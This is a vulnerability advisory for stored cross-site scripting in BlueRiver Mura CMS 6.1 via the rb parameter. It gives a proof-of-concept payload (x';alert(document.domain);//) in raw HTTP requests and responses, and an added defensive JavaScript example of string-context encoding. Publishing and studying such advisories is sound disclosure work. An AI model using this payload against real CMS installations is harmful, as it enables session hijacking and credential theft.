2017-001: BlueRiver Mura CMS vulnerable to Stored Cross Site Scripting Attacks via rb parameter

Original release date: May 30, 2017
Last revised: May 30, 2017
Severity: 7.5 (CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P)

BACKGROUND

Mura CMS is an open source content management system for CFML, created by Blue River Interactive Group.

Mura is designed for marketing departments, web designers and developers, and it is widely used by companies and organizations around the world such as NATO, NASA, GSA, European Commission, Intel, P&G, USA FDA, USA Social Security Administration, USA Senate, USA Navy, USA Dept of Health and Human Services, USA Dept. of Homeland, Schneider, First Hawaiian Bank, Boeing, Baylor College of Medicine and Michigan State University.

DESCRIPTION

BlueRiver Mura CMS is vulnerable to Stored Cross Site Scripting attacks via the rb parameter.
The stored script is executed every time a user visits the Mura CMS Administration Login Page.

PROOF OF CONCEPT

########################################
### Stored XSS Request
########################################
GET /path/admin/index.cfm?rb=x%27;alert(document.domain);// HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: s_vi=[CS]v1|2C5FE38B85311092-6000010DC0007122[CE]; AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1099438348%7CMCAID%7C2C5FE38B85311092-6000010DC0007122%7CMCIDTS%7C17313%7CMCMID%7C85409179856262413853165277697928813021%7CMCAAMLH-1496404669%7C6%7CMCAAMB-1496404669%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1495807069s%7CNONE%7CMCSYNCSOP%7C411-17320%7CvVersion%7C2.1.0; s_pers=%20cpn%3D%7C1653566268691%3B%20ppn%3Dadobe.com%7C1653566268694%3B%20s_amov%3D1%7C1495801669949%3B%20s_fid%3D372E39AA61EA3FA1-198193CA03B92617%7C1559063139263%3B%20s_vs%3D1%7C1495992939272%3B%20gpv%3Dcoldfusion.adobe.com%253Acoldfusion%253Aindex.cfm%253Ablog%7C1495992939278%3B%20s_nr%3D1495991139283-Repeat%7C1527527139283%3B; mbox=session#8092c2d4c21445d6809d0ebd62c80c34#1495801734|PC#8092c2d4c21445d6809d0ebd62c80c34.26_15#1559044671; georouting_presented=true; __CT_Data=gpv=1&apv_100_www20=1&cpv_100_www20=1&rpv_100_www20=1; aam_uuid=85612095538239441673145124797129108819; WRUIDAWS=1240751761843931; CFID=456409; CFTOKEN=e412f04e7813ca1-4149DA5A-5056-A56D-8CE03E8CA1EFA11D; ORIGINALURLTOKEN=9FFF7F6A%2D70C2%2D421D%2DA2013073200D197F; MOBILEFORMAT=false; rb=""; sfdc_session=-; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_ppv%3D-%252C29%252C29%252C671%3B; aam_uuid=85612095538239441673145124797129108819; s_fid=6DEA32486AB53A9B-168353046F737537; s_cc=true
Connection: close
Upgrade-Insecure-Requests: 1

########################################
### Response and Redirect to Stored XSS
########################################
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Location: ./?muraAction=clogin.main
Server: Microsoft-IIS/8.0
Generator: Mura CMS
X-Powered-By: ASP.NET
Date: Mon, 29 May 2017 08:31:36 GMT
Connection: close
Content-Length: 0

########################################
### Redirect Request
########################################
GET /path/admin/?muraAction=clogin.main HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: s_vi=[CS]v1|2C5FE38B85311092-6000010DC0007122[CE]; AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1099438348%7CMCAID%7C2C5FE38B85311092-6000010DC0007122%7CMCIDTS%7C17313%7CMCMID%7C85409179856262413853165277697928813021%7CMCAAMLH-1496404669%7C6%7CMCAAMB-1496404669%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1495807069s%7CNONE%7CMCSYNCSOP%7C411-17320%7CvVersion%7C2.1.0; s_pers=%20cpn%3D%7C1653566268691%3B%20ppn%3Dadobe.com%7C1653566268694%3B%20s_amov%3D1%7C1495801669949%3B%20s_fid%3D372E39AA61EA3FA1-198193CA03B92617%7C1559063139263%3B%20s_vs%3D1%7C1495992939272%3B%20gpv%3Dcoldfusion.adobe.com%253Acoldfusion%253Aindex.cfm%253Ablog%7C1495992939278%3B%20s_nr%3D1495991139283-Repeat%7C1527527139283%3B; mbox=session#8092c2d4c21445d6809d0ebd62c80c34#1495801734|PC#8092c2d4c21445d6809d0ebd62c80c34.26_15#1559044671; georouting_presented=true; __CT_Data=gpv=1&apv_100_www20=1&cpv_100_www20=1&rpv_100_www20=1; aam_uuid=85612095538239441673145124797129108819; WRUIDAWS=1240751761843931; CFID=456409; CFTOKEN=e412f04e7813ca1-4149DA5A-5056-A56D-8CE03E8CA1EFA11D; ORIGINALURLTOKEN=9FFF7F6A%2D70C2%2D421D%2DA2013073200D197F; MOBILEFORMAT=false; rb=""; sfdc_session=-; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_ppv%3D-%252C29%252C29%252C671%3B; aam_uuid=85612095538239441673145124797129108819; s_fid=6DEA32486AB53A9B-168353046F737537; s_cc=true
Connection: close
Upgrade-Insecure-Requests: 1


########################################
### Redirect Response with Stored XSS
########################################
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: 06 Nov 1994 08:37:34 GMT
Server: Microsoft-IIS/8.0
Generator: Mura CMS
X-Powered-By: ASP.NET
Date: Mon, 29 May 2017 08:31:46 GMT
Connection: close

<!DOCTYPE html>
[...SNIP...]
<!-- Mura Vars -->
<script type="text/javascript">
var htmlEditorType='';
var context='/path';
var themepath='/path/default/includes/themes/CleanCanvasWrap';
var rb='x';alert(document.domain);//';
var siteid='default';
var sessionTimeout=10800;
var activepanel=0;
var activetab=0;
var webroot='C:\\inetpub\\wwwroot';
var fileDelim='\\';
</script>
[...SNIP...]
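Added example (not part of the original advisory and not Mura CMS code): the response above places the stored rb value inside a single-quoted JavaScript string without encoding it. The JavaScript below renders that line with and without string-context encoding and evaluates both with a stubbed alert; the function names and the sample document.domain value are assumptions.

```javascript
// Added example, not Mura CMS code. Function names are hypothetical.

// Vulnerable pattern seen in the "Mura Vars" block: the stored value is
// concatenated into a single-quoted JavaScript string with no encoding.
function renderUnsafe(rb) {
  return "var rb='" + rb + "';";
}

// Context-aware encoding for a JavaScript string literal: every UTF-16 code
// unit outside [A-Za-z0-9] is emitted as \uXXXX, so the value cannot close
// the quote, start a comment, or end the surrounding <script> element.
function encodeForJsString(value) {
  const s = String(value);
  let out = "";
  for (let i = 0; i < s.length; i++) {
    const ch = s[i];
    out += /[A-Za-z0-9]/.test(ch)
      ? ch
      : "\\u" + s.charCodeAt(i).toString(16).padStart(4, "0");
  }
  return out;
}

function renderSafe(rb) {
  return "var rb='" + encodeForJsString(rb) + "';";
}

// Evaluates one rendered statement with stand-ins for the browser globals and
// reports the value rb ends up with and whether alert() was reached.
function evaluate(statement) {
  let alertCalled = false;
  const alert = () => { alertCalled = true; };
  const document = { domain: "constructed.example" }; // constructed value
  const run = new Function("alert", "document", statement + "\nreturn rb;");
  return { rb: run(alert, document), alertCalled };
}

// The rb value from the request above after URL decoding (%27 is ').
const stored = "x';alert(document.domain);//";

console.log(renderUnsafe(stored), evaluate(renderUnsafe(stored)));
console.log(renderSafe(stored), evaluate(renderSafe(stored)));
```

With the encoded form, rb holds the full submitted string as data and the stubbed alert is never reached.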

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser. This can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

This vulnerability was verified in BlueRiver Mura CMS 6.1 running under Adobe ColdFusion.

SOLUTION

Contact vendor for a fix.

REVISION HISTORY

May 30, 2017: Initial release

DISCLOSURE TIMELINE

  • May 29, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
  • May 30, 2017 : Contact with Google Security Team.
  • June 2, 2017 : Vendor Response/Feedback: this issue has been patched already in the latest 6.1 version.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a company based in Spain and Colombia and a leader in web application testing, network security, penetration testing, and security compliance implementation and assessment. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are a vendor-independent provider with deep expertise since 2001. Our R&D efforts include vulnerability research, collaboration on open security projects, whitepapers, presentations, and participation in and promotion of security events. For further information regarding our security services, contact us.